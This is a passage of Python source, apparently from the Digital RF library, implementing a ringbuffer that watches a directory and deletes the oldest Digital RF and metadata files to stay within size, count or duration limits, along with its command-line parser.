errstr = "One of `include_drf` or `include_dmd` must be True."
raise ValueError(errstr)
if self.status_interval is None:
self.status_interval = float("inf")
if self.size is not None:
if self.size < 0:
# get available space and reduce it by the (negative) size
# value to get the actual size to use
root = self.path
while not os.path.isdir(root):
root = os.path.dirname(root)
statvfs = os.statvfs(root)
bytes_available = statvfs.f_frsize * statvfs.f_bavail
if os.path.isdir(self.path):
existing = list_drf.ilsdrf(
self.path,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
for p in existing:
try:
bytes_available += os.path.getsize(p)
except OSError:
# catch instances where file no longer exists
if self.verbose:
traceback.print_exc()
return
self.size = max(bytes_available + self.size, 0)
self.event_handler = DigitalRFRingbufferHandler(
size=self.size,
count=self.count,
duration=self.duration,
verbose=self.verbose,
dryrun=self.dryrun,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
)
self._init_observer()
def _init_observer(self):
self.observer = watchdog_drf.DirWatcher(
self.path, force_polling=self.force_polling
)
self.observer.schedule(self.event_handler, self.path, recursive=True)
def _add_existing_files(self):
"""Add existing files on disk to ringbuffer."""
# since expiration will always remove the oldest files by sample index,
# and the handler has exception handling for duplicate / out of order events,
# we can add the existing files while the watch is handling events and the
# ringbuffer will still be good (with maybe some error messages when verbose)
# add existing files to ringbuffer handler
existing = list_drf.ilsdrf(
self.path,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
# do not sort because existing will already be sorted and we
# don't want to convert to a list
self.event_handler.add_files(existing, sort=False)
def start(self):
"""Start ringbuffer process."""
self._start_time = datetime.datetime.utcnow().replace(microsecond=0)
# start observer to add new files
self.observer.start()
if self.dryrun:
print("DRY RUN (files will not be deleted):")
now = datetime.datetime.utcnow().replace(microsecond=0)
print("{0} | Starting {1}:".format(now, self))
sys.stdout.flush()
# add files that already existed before the observer started
# (do it in another thread so we can get to join())
thread = threading.Thread(target=self._add_existing_files)
thread.daemon = True
thread.start()
self._task_threads.append(thread)
def _verify_ringbuffer_files(self, inbuffer):
"""Verify ringbuffer's `inbuffer` set of files with files on disk."""
# get set of all files that should be in the ringbuffer right away
# so we duplicate as few files from new events as possible
# events that happen while we build this file set can be duplicated
# when we verify the ringbuffer state below, but that's ok
ondisk = set(
list_drf.ilsdrf(
self.path,
starttime=self.starttime,
endtime=self.endtime,
include_drf=self.include_drf,
include_dmd=self.include_dmd,
include_drf_properties=False,
include_dmd_properties=False,
)
)
# now any file in inbuffer that is not in ondisk is a missed or
# duplicate deletion event, so remove those files
deletions = inbuffer - ondisk
self.event_handler.remove_files(deletions)
# any file in ondisk that is not in inbuffer is a missed or duplicate
# creation event, so add those files
creations = ondisk - inbuffer
self.event_handler.add_files(creations, sort=True)
# any file in both ondisk and inbuffer could have a missed modify
# event, so trigger a modify event for those files
possibly_modified = inbuffer & ondisk
self.event_handler.modify_files(possibly_modified, sort=True)
def _restart(self):
"""Restart observer using existing event handlers."""
# get list of files currently in ringbuffer before we modify it
# so we can detect missed events from after crash until ondisk
# file list is complete
inbuffer = set(self.event_handler.records.keys())
# make a new observer and start it ASAP
self._init_observer()
self.observer.start()
# verify existing state of ringbuffer
# (do it in another thread so we can get to join())
thread = threading.Thread(
target=self._verify_ringbuffer_files, kwargs=dict(inbuffer=inbuffer)
)
thread.daemon = True
thread.start()
self._task_threads.append(thread)
def join(self):
"""Wait until a KeyboardInterrupt is received to stop ringbuffer."""
try:
while True:
now = datetime.datetime.utcnow().replace(microsecond=0)
interval = int((now - self._start_time).total_seconds())
if (interval % self.status_interval) == 0:
status = self.event_handler.status()
print("{0} | ({1})".format(now, status))
sys.stdout.flush()
if not self.observer.all_alive():
# if not all threads of the observer are alive,
# reinitialize and restart
print("Found stopped thread, reinitializing and restarting.")
sys.stdout.flush()
# first make sure all task threads have stopped
for thread in self._task_threads:
while thread.is_alive():
print("Waiting for task thread to finish.")
sys.stdout.flush()
thread.join(1)
del self._task_threads[:]
self._restart()
time.sleep(1)
except KeyboardInterrupt:
# catch keyboard interrupt and simply exit
pass
finally:
self.stop()
sys.stdout.write("\n")
sys.stdout.flush()
self.observer.join()
def run(self):
"""Start ringbuffer and wait for a KeyboardInterrupt to stop."""
self.start()
self.join()
def stop(self):
"""Stop ringbuffer process."""
self.observer.stop()
def __str__(self):
"""Return string describing ringbuffer."""
amounts = []
if self.size is not None:
amounts.append("{0} bytes".format(self.size))
if self.count is not None:
amounts.append("{0} files".format(self.count))
if self.duration is not None:
amounts.append("{0} s".format(self.duration / 1e3))
s = "DigitalRFRingbuffer of ({0}) in {1}".format(", ".join(amounts), self.path)
return s
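# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Programmatic (non-CLI) use of DigitalRFRingbuffer, assuming the example path exists and
# holds (or will receive) Digital RF channel directories. run() blocks until Ctrl-C.
def _example_run_ringbuffer(path="/data/ringbuffer"):
    ringbuffer = DigitalRFRingbuffer(
        path,
        size=-200e6,  # use all available space except 200 MB (negative size, as documented above)
        count=None,
        duration=None,
        verbose=True,
        status_interval=10,
    )
    ringbuffer.run()  # start the observer, ingest existing files, then wait for KeyboardInterrupt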
def _build_ringbuffer_parser(Parser, *args):
desc = (
"Enforce ringbuffer of Digital RF and Digital Metadata files. When"
" the space threshold is exceeded, the oldest files are deleted until"
" the size constraint is met."
)
parser = Parser(*args, description=desc)
parser.add_argument("path", help="Directory in which to enforce ringbuffer.")
parser.add_argument(
"-z",
"--size",
default=None,
help="""Size of ringbuffer, in bytes or using unit symbols (e.g. 100GB).
Negative values are used to indicate all available space except
the given amount. (default: -200MB if no count or duration)""",
)
parser.add_argument(
"-c",
"--count",
type=int,
default=None,
help="""Max file count for each channel. (default: %(default)s)""",
)
parser.add_argument(
"-l",
"--duration",
default=None,
help="""Max duration for each channel in seconds.
(default: %(default)s)""",
)
parser.add_argument(
"-v",
"--verbose",
action="store_true",
help="Print the names of new/deleted files and the space consumed.",
)
parser.add_argument(
"-p",
"--status_interval",
type=int,
default=10,
help="""Interval in seconds between printing of status updates.
(default: %(default)s)""",
)
parser.add_argument(
"-n",
"--dryrun",
action="store_true",
help="Do not delete files when expiring them from the ringbuffer.",
)
parser = list_drf._add_time_group(parser)
includegroup = parser.add_argument_group(title="include")
includegroup.add_argument(
"--nodrf",
dest="include_drf",
action="store_false",
help="""Do not ringbuffer Digital RF HDF5 files.
(default: False)""",
)
includegroup.add_argument(
"--nodmd",
dest="include_dmd",
action="store_false",
help="""Do not ringbuffer Digital Metadata HDF5 files.
(default: False)""",
)
parser = watchdog_drf._add_watchdog_group(parser)
parser.set_defaults(func=_run_ringbuffer)
return parser
def _run_ringbuffer(args):
import signal
# parse size string into number of bytes
if args.size == "":
args.size = None
if args.size is not None:
suffixes = OrderedDict(
[
("B", 1),
("KB", 1000 ** 1),
("KiB", 1024 ** 1),
("MB", 1000 ** 2),
("MiB", 1024 ** 2),
("GB", 1000 ** 3),
("GiB", 1024 ** 3),
("TB", 1000 ** 4),
("TiB", 1024 ** 4),
("PB", 1000 ** 5),
("PiB", 1024 ** 5),
]
)
m = re.match(r"(?P<num>\-?\d+\.?\d*)(?P<suf>\D*)", args.size)
if not m:
raise ValueError(
"Size string not recognized. " "Use number followed by suffix."
)
sizenum = eval(m.group("num"))
suf = m.group("suf").strip()
if not suf:
args.size = sizenum
elif suf in suffixes:
args.size = sizenum * suffixes[suf]
else:
raise ValueError(
"Size suffix not recognized. Use one of:\n"
"{0}".format(list(suffixes.keys()))
)
elif args.count is None and args.duration is None:
args.size = -200e6
# evaluate duration to float, from seconds to milliseconds
if args.duration is not None:
args.duration = float(eval(args.duration)) * 1e3
if args.starttime is not None:
args.starttime = util.parse_identifier_to_time(args.starttime)
if args.endtime is not None:
args.endtime = util.parse_identifier_to_time(
args.endtime, ref_datetime=args.starttime
)
kwargs = vars(args).copy()
del kwargs["func"]
# handle SIGTERM (getting killed) gracefully by calling sys.exit
def sigterm_handler(signal, frame):
print("Killed")
sys.stdout.flush()
sys.exit(128 + signal)
signal.signal(signal.SIGTERM, sigterm_handler)
ringbuffer = DigitalRFRingbuffer(**kwargs)
print("Type Ctrl-C to quit.")
ringbuffer.run()
if __name__ == "__main__":
from argparse import ArgumentParser
parser = _build_ringbuffer_parser(ArgumentParser)
args = parser.parse_args()
args.func(args)
|